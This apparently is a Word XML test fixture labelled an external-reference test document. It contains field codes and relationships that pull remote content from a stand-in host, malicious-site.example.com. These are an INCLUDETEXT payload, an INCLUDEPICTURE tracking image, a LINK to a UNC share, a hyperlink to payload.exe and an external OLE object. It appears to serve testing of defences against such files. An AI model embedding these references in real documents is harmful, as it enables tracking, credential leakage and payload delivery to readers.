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t>EXTERNAL REFERENCE TEST DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>This document contains external references:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" INCLUDETEXT &quot;http://malicious-site.example.com/payload.txt&quot; ">
        <w:r>
          <w:t>External Content Here</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" INCLUDEPICTURE &quot;http://malicious-site.example.com/tracker.gif&quot; \d ">
        <w:r>
          <w:t>External Image</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:fldSimple w:instr=" LINK Excel.Sheet.12 &quot;\\malicious-server\share\data.xlsx&quot; Sheet1!R1C1 \a ">
        <w:r>
          <w:t>External Link</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p>
      <w:hyperlink r:id="rId1" w:history="1">
        <w:r>
          <w:t>Click here for malicious payload</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
  </w:body>
</w:document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hyperlink" Target="http://malicious-site.example.com/payload.exe" TargetMode="External"/>
    <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://malicious-site.example.com/data.bin" TargetMode="External"/>
</Relationships>
</file>